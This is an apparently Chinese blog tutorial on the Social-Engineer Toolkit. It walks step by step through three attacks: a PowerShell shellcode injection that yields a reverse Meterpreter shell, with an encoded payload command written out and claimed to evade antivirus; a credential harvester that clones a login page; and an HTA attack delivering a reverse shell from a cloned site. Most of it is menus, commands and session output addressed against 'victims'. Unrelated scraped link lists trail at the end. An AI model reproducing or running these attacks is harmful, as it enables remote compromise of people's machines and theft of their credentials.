社工工具包 SEToolkit
社会工程学(Social Engineering)简称社工,其通过分析攻击对象的心理弱点,利用人性的本能反应,以及任何好奇心,贪婪等心理特征进行的,使用诸如假冒,欺骗,引诱等多种手段来达成攻击目标的一种手段,社会工程学的应用领域非常之广泛,而很多黑客也会将社工运用到渗透的方方面面,社工也被称为没有技术,却比技术更强大的渗透方式,正所谓 “攻城为下,攻心为上” 这句话用在社工上面是最恰当不过的啦。
接下来将介绍一个工具,社会工程工具包(SEToolkit)工具,该工具由 David Kennedy (ReL1K)设计并开发,并且有一群活跃的社区合作进行维护工作(www.social-engineer.org),该工具包是开源的并使用Python作为开发语言,其主要目的是协助黑客更好的进行社工活动。
PowerShell 注入攻击
社工工具包中包含一个PowerShell注入攻击的有效载荷,适用于 Win7 - Win10系统使用,因为PowerShell脚本可以很容易的将ShellCode注入到目标的物理内存中,使用该载荷攻击不会触发病毒报警。
1.Kali系统中默认安装了SEToolkit工具,我们只需要运行该工具,然后从主菜单选择 1) Social-Engineering。
root@kali:~# setoolkit
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
2.然后在选择下一级菜单中的 9) PowerShell Attack Vectors。
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 9
3.接着我们选择第一个选项,Powershell Alphanumeric Shellcode Injector
1) Powershell Alphanumeric Shellcode Injector
2) Powershell Reverse Shell
3) Powershell Bind Shell
4) Powershell Dump SAM Database
99) Return to Main Menu
set:powershell> 1
4.首先设置好本机的IP地址,我这里是 192.168.1.40 然后等待生成PowerShell脚本,默认放在 /root/.set/reports/powershell/路径下,我们复制里面的内容。
Enter the IPAddress or DNS name for the reverse host: 192.168.1.40
set:powershell> Enter the port for the reverse [443]:
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
[*] Generating x86-based powershell injection code...
[*] Reverse_HTTPS takes a few seconds to calculate..One moment..
No encoder or badchars specified, outputting raw payload
Payload size: 380 bytes
Final size of c file: 1622 bytes
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : yes
5.通过各种途径,在被害主机上面执行这一段ShellCode代码。
powershell -w 1 -C "sv i -;sv pz ec;sv YD ((gv i).value.toString()+(gv pz).value.toString());powershell (gv YD).value.toString() 'JABOAHgAIAA9ACAAJwAkAEsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAa'"
6.回到Kali,会发现出现了一个会话,使用 sessions -i 查询,上线成功!
msf5 exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] https://0.0.0.0:443 handling request from 192.168.1.2; (UUID: skqutxoz) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.40:443 -> 192.168.1.2:64014) at 2019-08-14 12:29:21 +0800
msf5 exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows DESKTOP @ DESKTOP 192.168.1.40:443 -> 192.168.1.2:64014 (192.168.1.2)
msf5 exploit(multi/handler) >
SEToolkit 站点克隆
- SEToolkit 还支持站点克隆首先选择,1)Social-Engineering Attacks
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
2.接着选择,2)Website Attack Vectors
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 2
- 选择 3)Credential Harvester Attack Method
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
set:webattack>3
4.这里会有三个选项,第一个是使用系统自带的模板,第二个是克隆一个页面,第三个是自定义页面,此处选择2,并输入待克隆页面。
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.40]:192.168.1.40
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com
[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we're saying here.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
[*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?
Do you want to attempt to disable Apache? [y/n]: y
[ ok ] Stopping apache2 (via systemctl): apache2.service.
[ ok ] Stopping nginx (via systemctl): nginx.service.
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.
SEToolkit HTA 注入攻击
HTA shell注入攻击,生成一个克隆页面,当用户点击运行脚本的时候,会触发反弹一个Shell。
1.根据上方的步骤,重新运行SEToolkit工具然后选择,1)Social-Engineering Attacks
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
2.选择 2)Website Attack Vectors
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 2
3.选择 8)HTA Attack Method
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
set:webattack>8
4.选择 2)Site Cloner,克隆一个站点,然后选择一个攻击载荷,Meterpreter Reverse TCP
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com
[*] HTA Attack Vector selected. Enter your IP, Port, and Payload...
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.40]:
Enter the port for the reverse payload [443]:
Select the payload you want to deliver:
1. Meterpreter Reverse HTTPS
2. Meterpreter Reverse HTTP
3. Meterpreter Reverse TCP
Enter the payload number [1-3]: 3
5.用户点击页面,运行脚本以后,成功反弹Shell。
社工工具包 SEToolkit的更多相关文章
- 我是如何社工TDbank获取朋友隐私的
原创 ziwen@beebeeto 转载请保留本行 个人感觉 国外的安全方面对社工的了解和防范并不是很好 即使他们使用社工的时间比我们要长很多 比如 他们的visa在pos机上使用是不需要密码的 而且 ...
- python 模拟ajax查询社工库...
在windows中使用,输入有关信息查询社工库,本来是网页版的,我把ajax请求提取出来.粗略的封装下,挺好玩. #coding:utf8 import urllib2,urllib from Bea ...
- 社工数据搜索引擎搭建 - Build Social Engineer Evildata Search Engine
如何设计搭建一个社工库 从初起设计一个社工库,到现在的Beta,前前后后零零整整花了不下一个月的时间,林林总总记录下来,留给需要之人 泄露数据库格式不一,长相奇葩,因需将用户名.密码.邮箱.哈希等信息 ...
- 常见社工破解WPA2密码方法及防范措施
0×00前言 何为社工?社工是一种通过利用受害者心理弱点,如本能反应.好奇心.同情心.信任.贪婪等进行诸如欺骗.盗取.控制等非法手段的一种攻击方式.在无线安全中也可以利用社工做到许多非法操作.下面举几 ...
- bugku 社工进阶
首先看到的是 由于之前知道有bugku的百度吧 并且这个是一个社工题所以可以试一下这个百度吧 进入百度吧然后会见到 这句话的意思是要我们登录这个账号 但是我们只有账号没有密码 如果爆破的话很有可 ...
- Bugku-CTF社工篇之简单的社工尝试
- Bugku-CTF社工篇之王晓明的日记
- Bugku-CTF社工篇之社工进阶
- Bugku-CTF社工篇之简单的个人信息收集
随机推荐
- UVALive 4254 Processor ——(二分+优先队列处理)
题目是求最小化最大值,很显然是二分,但是二分以后怎么判断mid是否可行并不容易. 代码参考了网上一个博客的代码.巧妙之处在于一秒一秒的考虑,这样可以把处理速度mid直接转化成1秒内实际的量来解决(避免 ...
- WIN10环境下点击通知栏图标时自动切换输入法导致图标位置变动
这个问题由来已久,每当点击系统右下角任务栏中的按钮时,原本是搜狗输入法就会自动变成“US [ 中文(简体,中国) ]”,图标会自动错位,导致响应的是其他功能. 假设上图是正常的环境,此时我点击电池图标 ...
- Shiro RememberMe 1.2.4远程代码执行漏洞-详细分析
本文首发于先知: https://xz.aliyun.com/t/6493 0x01.漏洞复现 环境配置 https://github.com/Medicean/VulApps/tree/master ...
- Linux设备驱动程序 之 vmalloc
vmalloc()函数的工作方式类似于kmalloc(),只不过在前者分配的内存虚拟地址是连续的,而物理地址则无须连续:这也是用户空间分配函数的工作方式:由malloc()返回的页在进程的虚拟地址空间 ...
- nltk data 离线安装
运行程序时发现如下错误: 在命令行下载速度太慢,因此需要离线安装: 按照:http://www.nltk.org/data.html 中manual installation的方法, 将包下载好后解压 ...
- 一个数据库操作类,适用于Oracle,ACCESS,SQLSERVER
最近做了一个数据诊断的项目,里面自己写了一个数据库的操作类,包含:连接数据库.读数据表.执行SQL操作,释放数据库等组成,希望对大家有用,由于水平有限,若有错误或者代码不足地方欢迎指正,谢谢. ADO ...
- Antecedent Membership Functions相关资料
属于模糊控制领域 前件隶属函数(Antecedent Membership Functions) 基于模糊近似的强化学习方法研究 - 豆丁网 https://www.docin.com/p-13022 ...
- PC通过netsh获取wifi密码
1.查看当前系统所有保存wifi的ssid netsh wlan show profiles 2.根据指定ssid查看wifi密码,密码就是关键内容 netsh wlan show profile n ...
- kotlin中集合
fun main(arg: Array<String>) { //可读写的集合创建 val mutableListOf1 = mutableListOf<Int>(1, 2, ...
- nginx使用场景
1. 对外开放本地封闭Server 本地server无法对外开放,nginx做反向代理,对外开发,使得外部可以访问封闭服务. upstream npm { server ; keepalive ; } ...